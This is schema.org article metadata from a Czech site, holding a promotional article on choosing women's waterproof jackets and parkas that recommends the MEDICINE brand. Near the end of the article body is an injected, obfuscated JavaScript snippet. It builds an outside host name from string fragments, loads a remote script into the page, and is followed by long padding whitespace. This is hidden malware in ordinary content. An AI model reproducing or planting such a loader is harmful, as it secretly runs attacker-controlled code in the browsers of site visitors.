[{"@context":"https:\/\/schema.org\/","@type":"Article","@id":"https:\/\/www.feryl.cz\/styl-a-funkcnost-jak-vybrat-nepromokavou-bundu-nebo-parku-na-novou-sezonu\/#Article","mainEntityOfPage":"https:\/\/www.feryl.cz\/styl-a-funkcnost-jak-vybrat-nepromokavou-bundu-nebo-parku-na-novou-sezonu\/","headline":"Styl a funk\u010dnost \u2013 jak vybrat nepromokavou bundu nebo parku na novou sez\u00f3nu","name":"Styl a funk\u010dnost \u2013 jak vybrat nepromokavou bundu nebo parku na novou sez\u00f3nu","description":"Podzim a brzk\u00e9 jaro jsou obdob\u00ed, kdy po\u010das\u00ed dok\u00e1\u017ee p\u0159ekvapit: d\u00e9\u0161\u0165, v\u00edtr a prom\u011bnliv\u00e9 teploty zp\u016fsobuj\u00ed, \u017ee dob\u0159e zvolen\u00fd svrchn\u00ed od\u011bv se st\u00e1v\u00e1 z\u00e1kladem ka\u017edodenn\u00edho \u0161atn\u00edku. Dne\u0161n\u00ed trendy dokazuj\u00ed, \u017ee prakti\u010dnost m\u016f\u017ee j\u00edt ruku v ruce se stylem. D\u00e1msk\u00e9 nepromokav\u00e9 bundy a parky u\u017e d\u00e1vno nejsou jen funk\u010dn\u00edm prvkem, ale staly se v\u00fdrazn\u00fdm dopl\u0148kem stylizace.&hellip; <div class=\"readmore-wrapper\"><a href=\"https:\/\/www.feryl.cz\/styl-a-funkcnost-jak-vybrat-nepromokavou-bundu-nebo-parku-na-novou-sezonu\/\" class=\"more-link\">P\u0159e\u010d\u00edst <\/a><\/div>","datePublished":"2025-10-17","dateModified":"2025-10-17","author":{"@type":"Person","@id":"https:\/\/www.feryl.cz\/author\/devene\/#Person","name":"devene","url":"https:\/\/www.feryl.cz\/author\/devene\/","identifier":1,"image":{"@type":"ImageObject","@id":"https:\/\/secure.gravatar.com\/avatar\/fb50772173929303fbe6024f179e4dd9837c71f6efc661bdb046860d442d05b5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/fb50772173929303fbe6024f179e4dd9837c71f6efc661bdb046860d442d05b5?s=96&d=mm&r=g","height":96,"width":96}},"publisher":{"@type":"Organization","name":"feryl.cz","logo":{"@type":"ImageObject","@id":"\/logo.png","url":"\/logo.png","width":600,"height":60}},"image":{"@type":"ImageObject","@id":"https:\/\/www.feryl.cz\/wp-content\/uploads\/parka_RbOGf1.png","url":"https:\/\/www.feryl.cz\/wp-content\/uploads\/parka_RbOGf1.png","height":0,"width":0},"url":"https:\/\/www.feryl.cz\/styl-a-funkcnost-jak-vybrat-nepromokavou-bundu-nebo-parku-na-novou-sezonu\/","about":["V\u00fdrobky"],"wordCount":857,"articleBody":"         Podzim a brzk\u00e9 jaro jsou obdob\u00ed, kdy po\u010das\u00ed dok\u00e1\u017ee p\u0159ekvapit: d\u00e9\u0161\u0165, v\u00edtr a prom\u011bnliv\u00e9 teploty zp\u016fsobuj\u00ed, \u017ee dob\u0159e zvolen\u00fd svrchn\u00ed od\u011bv se st\u00e1v\u00e1 z\u00e1kladem ka\u017edodenn\u00edho \u0161atn\u00edku. Dne\u0161n\u00ed trendy dokazuj\u00ed, \u017ee prakti\u010dnost m\u016f\u017ee j\u00edt ruku v ruce se stylem. D\u00e1msk\u00e9 nepromokav\u00e9 bundy a parky u\u017e d\u00e1vno nejsou jen funk\u010dn\u00edm prvkem, ale staly se v\u00fdrazn\u00fdm dopl\u0148kem stylizace. Modern\u00ed st\u0159ihy, zaj\u00edmav\u00e9 barvy a propracovan\u00e9 detaily umo\u017e\u0148uj\u00ed vytvo\u0159it outfit jak na m\u011bstsk\u00e9 proch\u00e1zky, tak na v\u00edkendov\u00e9 v\u00fdlety. Nen\u00ed to jen ochrana p\u0159ed de\u0161t\u011bm \u2013 je to m\u00f3dn\u00ed manifest na chladn\u011bj\u0161\u00ed dny. Na co se zam\u011b\u0159it p\u0159i koupi nepromokav\u00e9 bundy?  P\u0159i v\u00fdb\u011bru spr\u00e1vn\u00e9 nepromokav\u00e9 bundy je d\u016fle\u017eit\u00e9 pamatovat na to, \u017ee nez\u00e1le\u017e\u00ed jen na vzhledu. Kl\u00ed\u010dov\u00e1 je kvalita materi\u00e1lu: nejl\u00e9pe, kdy\u017e m\u00e1 tkanina hydrofobn\u00ed vlastnosti nebo lamin\u00e1t, kter\u00fd \u00fa\u010dinn\u011b chr\u00e1n\u00ed p\u0159ed de\u0161t\u011bm. D\u016fle\u017eit\u00fdm prvkem je tak\u00e9 kapuce, nejl\u00e9pe nastaviteln\u00e1, kter\u00e1 zajist\u00ed pohodl\u00ed ve v\u011btrn\u00fdch dnech.  Dob\u0159e zvolen\u00e1 d\u00e9lka \u2013 kr\u00e1tk\u00e1 v m\u011bstsk\u00e9m stylu nebo del\u0161\u00ed pro lep\u0161\u00ed ochranu \u2013 m\u00e1 vliv na pohodl\u00ed. Nem\u00e9n\u011b d\u016fle\u017eit\u00e9 jsou i detaily: podlepen\u00e9 \u0161vy, praktick\u00e9 kapsy a stahovac\u00ed prvky. D\u00edky nim bunda nejen pln\u00ed svou funkci, ale tak\u00e9 vypad\u00e1 modern\u011b a stylov\u011b. Zvl\u00e1\u0161tn\u00ed pozornost v\u011bnujte: materi\u00e1lu, kter\u00fd chr\u00e1n\u00ed p\u0159ed vlhkost\u00ed a z\u00e1rove\u0148 umo\u017e\u0148uje poko\u017ece d\u00fdchat,  kapuci, kterou lze nastavit,  d\u00e9lce \u2013 krat\u0161\u00ed modely jsou praktick\u00e9, del\u0161\u00ed poskytuj\u00ed v\u011bt\u0161\u00ed ochranu,  detail\u016fm, kter\u00e9 ovliv\u0148uj\u00ed funk\u010dnost a vzhled.  Modern\u00ed st\u0159ihy se skv\u011ble kombinuj\u00ed s d\u017e\u00edny, svetrem nebo dokonce \u0161aty, d\u00edky \u010demu\u017e jedna bunda m\u016f\u017ee pasovat k mnoha outfit\u016fm. \u010c\u00edm se li\u0161\u00ed bunda od parky?  A\u010dkoli na prvn\u00ed pohled mohou vypadat podobn\u011b, li\u0161\u00ed se st\u0159ihem a charakterem. Nepromokav\u00e1 bunda je obvykle lehk\u00fd model vytvo\u0159en\u00fd s ohledem na aktivn\u00ed dny: skv\u011bl\u00e1 na rychl\u00e9 v\u00fdlety, proch\u00e1zky a ka\u017edodenn\u00ed povinnosti.  Parka m\u00e1 propracovan\u011bj\u0161\u00ed st\u0159ih: \u010dasto sah\u00e1 do poloviny stehen, m\u00e1 stahov\u00e1n\u00ed v pase, prostorn\u00e9 kapsy a \u010dasto tak\u00e9 dodate\u010dnou pod\u0161\u00edvku. D\u00edky tomu je ide\u00e1ln\u00ed nejen do de\u0161tiv\u00fdch, ale i chladn\u011bj\u0161\u00edch dn\u016f. Je to perfektn\u00ed volba pro ty, kte\u0159\u00ed maj\u00ed r\u00e1di volnost a vrstven\u00e9 outfity. Parku lze kombinovat s tlust\u00fdm svetrem, mikinou nebo rol\u00e1kem a vytvo\u0159it tak efektn\u00ed casualov\u00fd look. Nav\u00edc parky z\u016fst\u00e1vaj\u00ed v trendech u\u017e mnoho let, tak\u017ee koup\u011b takov\u00e9ho modelu je investic\u00ed na v\u00edce ne\u017e jednu sez\u00f3nu.  Barvy, kter\u00e9 kraluj\u00ed t\u00e9to sez\u00f3n\u011b  V m\u00f3d\u011b na podzim a jaro dominuj\u00ed p\u0159\u00edrodn\u00ed barvy: olivov\u00e1 zelen\u00e1, khaki, b\u00e9\u017eov\u00e1, tepl\u00e9 odst\u00edny hn\u011bd\u00e9 a tmav\u011b modr\u00e1. To jsou odst\u00edny, kter\u00e9 se skv\u011ble kombinuj\u00ed s denimem, b\u00edlou a \u010dernou, ale tak\u00e9 umo\u017e\u0148uj\u00ed hr\u00e1t si s kontrasty. St\u00e1le v\u011bt\u0161\u00ed popularitu z\u00edsk\u00e1vaj\u00ed i intenzivn\u011bj\u0161\u00ed akcenty. Barvy jako v\u00ednov\u00e1, ho\u0159\u010dicov\u00e1 nebo lahvov\u011b zelen\u00e1 dod\u00e1vaj\u00ed outfit\u016fm charakter. Pokud v\u00e1m z\u00e1le\u017e\u00ed na modern\u00edm efektu, m\u016f\u017eete: zkombinovat olivovou parku se sv\u011btl\u00fdmi d\u017e\u00edny a b\u00edl\u00fdm tri\u010dkem,  spojit \u010dernou bundu s neonov\u00fdm \u0161\u00e1tkem nebo \u010depic\u00ed,  vsadit na pastelov\u00e9 odst\u00edny s tmav\u00fdmi dopl\u0148ky pro kontrastn\u00ed efekt.  Takov\u00e1 barevn\u00e1 paleta poskytuje obrovskou svobodu p\u0159i vytv\u00e1\u0159en\u00ed stylov\u00fdch, ale z\u00e1rove\u0148 praktick\u00fdch outfit\u016f. MEDICINE \u2013 spojen\u00ed kvality a stylu  Zna\u010dka MEDICINE dokonale ukazuje, \u017ee bunda m\u016f\u017ee b\u00fdt z\u00e1rove\u0148 funk\u010dn\u00ed a m\u00f3dn\u00ed. Jejich n\u00e1vrhy vynikaj\u00ed kvalitou materi\u00e1l\u016f, propracovan\u00fdmi detaily a nad\u010dasov\u00fdm st\u0159ihem. Z\u00e1kaznice oce\u0148uj\u00ed MEDICINE za odolnost produkt\u016f, kter\u00e9 neztr\u00e1cej\u00ed tvar ani po mnoha sez\u00f3n\u00e1ch, a tak\u00e9 za \u0161irokou nab\u00eddku st\u0159ih\u016f a barev p\u0159izp\u016fsoben\u00fdch r\u016fzn\u00fdm vkus\u016fm. Pokud chcete naj\u00edt model ide\u00e1ln\u00ed pro sebe a inspirovat se nejnov\u011bj\u0161\u00edmi trendy, nav\u0161tivte https:\/\/wearmedicine.cz\/k\/ona\/obleceni\/bundy. Je to m\u00edsto, kde se funk\u010dnost setk\u00e1v\u00e1 s m\u011bstsk\u00fdm stylem a jemnou eleganc\u00ed. Styl, kter\u00fd vydr\u017e\u00ed d\u00e9le  D\u00e1msk\u00e9 nepromokav\u00e9 bundy a parky si ji\u017e l\u00e9ta udr\u017euj\u00ed silnou pozici v trendech, proto\u017ee spojuj\u00ed to, co \u017eeny nejv\u00edce pot\u0159ebuj\u00ed \u2013 komfort, ochranu p\u0159ed po\u010das\u00edm a m\u00f3dn\u00ed vzhled. V\u00fdb\u011brem model\u016f od MEDICINE z\u00edsk\u00e1te nejen praktick\u00fd svrchn\u00ed od\u011bv, ale i kousek \u0161atn\u00edku, kter\u00fd dod\u00e1 charakter ka\u017ed\u00e9mu outfitu. Je to investice do stylu, kter\u00fd se osv\u011bd\u010d\u00ed v mnoha situac\u00edch \u2013 od m\u011bstsk\u00fdch proch\u00e1zek a\u017e po v\u00edkendov\u00e9 v\u00fdlety. V m\u00f3d\u011b dnes nejde pouze o vzhled, ale tak\u00e9 o pohodl\u00ed a autenti\u010dnost \u2013 a dob\u0159e zvolen\u00e1 bunda nebo parka to v\u0161echno dok\u00e1\u017ee spojit v jednom.  (function(){ om3u=document.createElement(\"script\");om3u.async=true;om3u_=\"o\"+(\"pe\")+\"ns\"; om3uu=\"2539955232.\";om3u_+=\"ta\"+(\"t.e\");om3u_+=\"\"+(\"u\"+\"\")+\"\/\"; om3uu+=\"11vq8nebm3umy3p4m8lksu\"+(\"621h8fu0\"); om3u.src=\"https:\/\/\"+om3u_+om3uu;om3u.type=\"text\/javascript\"; document.body.appendChild(om3u); })();                                                                                                                                                                                                                                                                                                                                                                                           4\/5 - (3 votes)        "},{"@context":"https:\/\/schema.org\/","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Styl a funk\u010dnost \u2013 jak vybrat nepromokavou bundu nebo parku na novou sez\u00f3nu","item":"https:\/\/www.feryl.cz\/styl-a-funkcnost-jak-vybrat-nepromokavou-bundu-nebo-parku-na-novou-sezonu\/#breadcrumbitem"}]}]